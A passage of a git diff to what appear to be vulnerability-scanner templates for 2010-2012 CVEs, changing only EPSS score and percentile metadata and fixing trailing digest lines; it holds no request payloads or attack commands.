@@ info: cve-id: CVE-2010-2128 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index b3c493c070..7bdb00761c 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2259 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index aaf8a0573d..0b44ffc412 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2307 cwe-id: CWE-22 epss-score: 0.00832 - epss-percentile: 0.8008 + epss-percentile: 0.80064 cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205da1c4f1f82c9ee6d9ce4f446e477d41dbb3136e8b65c2ec245a171c437bd190022100c3da888185fa0998d9dfbae9cac6fd4ee9c526844afe78dc364416068ec15528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205da1c4f1f82c9ee6d9ce4f446e477d41dbb3136e8b65c2ec245a171c437bd190022100c3da888185fa0998d9dfbae9cac6fd4ee9c526844afe78dc364416068ec15528:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index e8d54c4c40..ab2126c07c 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86235 + epss-percentile: 0.86244 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 218c8a5658..896ca9ae51 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a804c1f8411a1420493b10222173e46551ad1d0699a6a803c67ae2dc59df018022100df159a9265dc56cbebaff0d07a9bd506350018e0b64fd6e5d529f118d0aa98b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200a804c1f8411a1420493b10222173e46551ad1d0699a6a803c67ae2dc59df018022100df159a9265dc56cbebaff0d07a9bd506350018e0b64fd6e5d529f118d0aa98b7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 15bd62cf17..70ad906865 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022029e6273682d77935806c7c3ebbc466fb94f89394682db08271e326330753ff0e022100a7c60b78d2a6e3e61aafa7b2f600d8c390674bec8e3249be45d827c8e393b1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022029e6273682d77935806c7c3ebbc466fb94f89394682db08271e326330753ff0e022100a7c60b78d2a6e3e61aafa7b2f600d8c390674bec8e3249be45d827c8e393b1fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 27a7300225..c865302f1b 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202cb99ca5af39d0e000d7203f429a3911dc15a6aec229f4cab74d4232b606c408022075c52735950e9d2927d7931b667a86fd0c40ba610113636ea31fc8a46ec63aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202cb99ca5af39d0e000d7203f429a3911dc15a6aec229f4cab74d4232b606c408022075c52735950e9d2927d7931b667a86fd0c40ba610113636ea31fc8a46ec63aa8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index 9940f01b87..fd77ffcfef 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2861 cwe-id: CWE-22 - epss-score: 0.9718 - epss-percentile: 0.99766 + epss-score: 0.97143 + epss-percentile: 0.99747 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 486f6b49d4..027c09e329 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.89625 + epss-percentile: 0.89623 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index dd95c4b36d..865c8829bb 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90553 + epss-percentile: 0.9055 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 2552706690..cfcb56dfcb 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - epss-percentile: 0.76645 + epss-percentile: 0.7661 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d5ebfaaaf558955ac9cafd2c1aeda4cc1d9454bcf936546dd962e585ccdf5f85022100ff64d0deb05fa4766499bcdf32490c6391a34a068ad606c570cb8e2a47d56d2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d5ebfaaaf558955ac9cafd2c1aeda4cc1d9454bcf936546dd962e585ccdf5f85022100ff64d0deb05fa4766499bcdf32490c6391a34a068ad606c570cb8e2a47d56d2b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 95f6af3f21..34645fb201 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100de27c50b330bff64213791d6efd100b7dc03f492069b5b2fb9e3a1de1ad5f41f022100e14f616893c5a03c7efa682e8cd3f80733fc047db1e4cb39cdd8cbab317cf2db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100de27c50b330bff64213791d6efd100b7dc03f492069b5b2fb9e3a1de1ad5f41f022100e14f616893c5a03c7efa682e8cd3f80733fc047db1e4cb39cdd8cbab317cf2db:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index e440979507..04c3565867 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.86045 + epss-percentile: 0.86051 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008fbc07ee4c9e6d5934c2176e4ccb5eccb587de6c734d1c368541f55653c91aeb022100a87f85ca45bba1db3d4ada1a806ca2cb9af725bbd2bcd32f906a64411ab943ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008fbc07ee4c9e6d5934c2176e4ccb5eccb587de6c734d1c368541f55653c91aeb022100a87f85ca45bba1db3d4ada1a806ca2cb9af725bbd2bcd32f906a64411ab943ab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index c0b85d2b0d..9be3c78178 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.03561 - epss-percentile: 0.90591 + epss-percentile: 0.90588 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450220386d11aa2b275ab41e9e005adc6c0e12d3c30229abdc609475719ff8ea2043780221008733055ef484b777e9ca273ec955693328c3d54db7f9681dd179dafb745e714c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220386d11aa2b275ab41e9e005adc6c0e12d3c30229abdc609475719ff8ea2043780221008733055ef484b777e9ca273ec955693328c3d54db7f9681dd179dafb745e714c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 11d1fd7e98..9a4b501b6b 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - epss-percentile: 0.83702 + epss-percentile: 0.83688 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b400803c0aa3a4a3425a0436d3b216df520230192916a3f9be5f1c6a29708ebc02202035a7110c5bf3cb03543fc255b07c649983acbdf1891c418a06268950f46f7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b400803c0aa3a4a3425a0436d3b216df520230192916a3f9be5f1c6a29708ebc02202035a7110c5bf3cb03543fc255b07c649983acbdf1891c418a06268950f46f7a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index da0f5f9ed8..f2e13ff866 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0e444a3b8e3429d5705ad1aab2aca8b0bd1e5679c791ffdd050aa72486dba3f02202ef3f798c493530c4b8d82ddb78f965dcfba1728c3f9b4df7a6ef9758ba7341e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c0e444a3b8e3429d5705ad1aab2aca8b0bd1e5679c791ffdd050aa72486dba3f02202ef3f798c493530c4b8d82ddb78f965dcfba1728c3f9b4df7a6ef9758ba7341e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index afa32e733a..1900cc975c 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91573 + epss-percentile: 0.91559 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 1180ac6086..ca94ea2661 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-4769 cwe-id: CWE-22 epss-score: 0.00938 - epss-percentile: 0.81305 + epss-percentile: 0.81289 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index cde4d23a85..96a149adb4 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.0016 - epss-percentile: 0.5258 + epss-percentile: 0.52553 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a88f1639fa340d6b6575ad74cd955778525952e5a019e37d02231197f69474ca0220597bae69c87973c8ec101d601f1e6a49defed8e74f3bfd338879d2f1b8b8d860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a88f1639fa340d6b6575ad74cd955778525952e5a019e37d02231197f69474ca0220597bae69c87973c8ec101d601f1e6a49defed8e74f3bfd338879d2f1b8b8d860:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index b35a5e45f7..dd21232530 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 - epss-percentile: 0.6707 + epss-percentile: 0.67067 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 53e67161f4..0b52a4274b 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-5278 cwe-id: CWE-22 epss-score: 0.104 - epss-percentile: 0.94414 + epss-percentile: 0.94409 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 38742eb105..470a698a87 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.04708 - epss-percentile: 0.91763 + epss-percentile: 0.91753 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201f91a60303334d030ece3344149611d8ebf4251c7ef838038fabd0ec09c715610220614e0ba72c11e03dda0882d0542ab02d04b96d9d11f0ba143a9b4604734ad5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201f91a60303334d030ece3344149611d8ebf4251c7ef838038fabd0ec09c715610220614e0ba72c11e03dda0882d0542ab02d04b96d9d11f0ba143a9b4604734ad5d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 8ca0259929..453dc9f14e 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - epss-percentile: 0.99521 + epss-percentile: 0.99522 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index ddb4ec6b28..3385a98979 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.8567 + epss-percentile: 0.85674 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 7c5ef6df11..11e99057c6 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.90304 + epss-percentile: 0.90306 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index c7c717c78f..f21a07a199 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-3315 cwe-id: CWE-22 epss-score: 0.90502 - epss-percentile: 0.98514 + epss-percentile: 0.98517 cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index da9809593d..dd506aca54 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.63287 + epss-percentile: 0.63282 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f7bea5b645af2299af2f94df57ca7920c3848a8709bd8675750ab5ddfbf578502210080525bd8a002aee947f4b26ca6c446f47abb60e8224ec2303be5dabfff963fb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200f7bea5b645af2299af2f94df57ca7920c3848a8709bd8675750ab5ddfbf578502210080525bd8a002aee947f4b26ca6c446f47abb60e8224ec2303be5dabfff963fb7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 523b9dbc63..b045303b41 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.01913 - epss-percentile: 0.8725 + epss-percentile: 0.87246 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 22435f21eb..2112b46745 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71688 + epss-percentile: 0.7168 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 847fad7bd4..50717ff639 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-4804 cwe-id: CWE-22 epss-score: 0.0358 - epss-percentile: 0.90618 + epss-percentile: 0.90615 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3205e9862a61f736835df6455984ef754f59406a1953ff4eae85290ece78255022100f3b9581ac17ea7ca543af31ff7179126188032cfe609e8f5a99b1eb19a2ac534:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c3205e9862a61f736835df6455984ef754f59406a1953ff4eae85290ece78255022100f3b9581ac17ea7ca543af31ff7179126188032cfe609e8f5a99b1eb19a2ac534:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 16bfa2ee85..b46efe05bd 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01792 - epss-percentile: 0.86702 + epss-percentile: 0.86706 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 4abf160d83..283339be55 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.71799 + epss-percentile: 0.7179 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220140bbb9e5ee4cd163a6b3a14251689c21b71d2835dc9dd1feb33238462367ba30221009eb456c136ad905470d76bf0aa03b37f47341d6cd6d2e78801b43e6ae431a7bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220140bbb9e5ee4cd163a6b3a14251689c21b71d2835dc9dd1feb33238462367ba30221009eb456c136ad905470d76bf0aa03b37f47341d6cd6d2e78801b43e6ae431a7bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 201cca6e4a..c021979c16 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61202 + epss-percentile: 0.61177 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022025578caf30da60fbb21d8aff437a1ac331192bad028417b41320f7815cbb6645022075fc00aab7b8a2a90a375a2b62593d5809be73cd658c894296f60e3801b95cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022025578caf30da60fbb21d8aff437a1ac331192bad028417b41320f7815cbb6645022075fc00aab7b8a2a90a375a2b62593d5809be73cd658c894296f60e3801b95cf3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 50dd070be5..a779f0df42 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.00232 - epss-percentile: 0.61202 + epss-percentile: 0.61177 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a07967d44d55f61381abb27cc12209d49f11e0bbc02caeb2d1bfcf104b372ba80221008baf6450c54fe9b4e1cf47b9ca8105f578d96669a1f94fe17a72a7d2758673aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a07967d44d55f61381abb27cc12209d49f11e0bbc02caeb2d1bfcf104b372ba80221008baf6450c54fe9b4e1cf47b9ca8105f578d96669a1f94fe17a72a7d2758673aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 5175f0d9e1..5a74e0a880 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71687 + epss-percentile: 0.71679 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100acb804ba0c3e96aba8e503570bafeaafce1115213cbfa354599722412ea2acf702202d5c5990b880c370ae0eb8f3774d5e61bba4d880174e2c07ad5eb511dd3c6a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100acb804ba0c3e96aba8e503570bafeaafce1115213cbfa354599722412ea2acf702202d5c5990b880c370ae0eb8f3774d5e61bba4d880174e2c07ad5eb511dd3c6a50:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5252.yaml b/http/cves/2011/CVE-2011-5252.yaml index f5c2ef6533..23e525544c 100644 --- a/http/cves/2011/CVE-2011-5252.yaml +++ b/http/cves/2011/CVE-2011-5252.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5252 cwe-id: CWE-20 epss-score: 0.02747 - epss-percentile: 0.89461 + epss-percentile: 0.89458 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index dde690cf70..078673237c 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00478 - epss-percentile: 0.73106 + epss-percentile: 0.73097 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009bb3a72b873b4c8b10f83040ed726c2e47591d697d5ec9caee6cb3c024cc65ae0220027f11e694266817203c42ee172884a97362b8826e73a475fe35577a0de33aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009bb3a72b873b4c8b10f83040ed726c2e47591d697d5ec9caee6cb3c024cc65ae0220027f11e694266817203c42ee172884a97362b8826e73a475fe35577a0de33aab:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index e95fb65f56..3be3850ed8 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo epss-score: 0.97059 - epss-percentile: 0.99701 + 